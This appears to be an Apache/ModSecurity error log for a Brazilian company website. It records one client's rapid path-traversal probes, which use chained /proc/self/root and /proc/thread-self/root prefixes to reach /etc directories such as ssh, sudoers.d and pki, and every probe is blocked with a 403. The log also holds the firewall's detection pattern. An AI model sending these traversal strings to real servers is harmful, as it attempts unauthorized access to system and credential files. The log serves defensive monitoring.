[Wed Mar 18 05:54:34.213294 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:45926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoSta6ubjKNq_cu4ZkLwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:38.799306 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:45934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoTtY0UrI5A3LftIxlHAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:40.176334 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:39728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoUPu8EFLIOrSqIpvUIAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:54:44.083511 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:39734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoVEzinOy1jxa1j4fgYwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:45.439150 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:39736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoVeoXxyEfFpUF8f867QAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:46.778853 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:39740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoVsdf6f5d65gmYZSgcgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:48.129085 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:39742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoWNa6ubjKNq_cu4ZkNgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:49.523064 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:57616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoWfu8EFLIOrSqIpvUIwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:52.089025 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:57624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoXMdf6f5d65gmYZSgdwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:53.458624 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:57628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoXUzinOy1jxa1j4fgZQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:53.694850 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:57628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoXUzinOy1jxa1j4fgZgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:55.047830 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:57630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoXymAPhZkrhU8w4k86QAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:57.404519 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:57640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoYda6ubjKNq_cu4ZkQQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:58.816694 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:57656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoYgkwaGbbGflqUZDfXgAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:00.303387 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:54172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoZAkwaGbbGflqUZDfZAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:01.772637 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:54180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoZUzinOy1jxa1j4fgaQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:01.986941 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:54180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoZUzinOy1jxa1j4fgagAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:03.967014 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:54188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoZ-yqAr6etmhZHNqJywAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:06.011618 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:54194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoatY0UrI5A3LftIxlMQAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:10.299258 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:54200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoa0zinOy1jxa1j4fgcQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:55:11.829890 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:47412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpob0zinOy1jxa1j4fgdAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
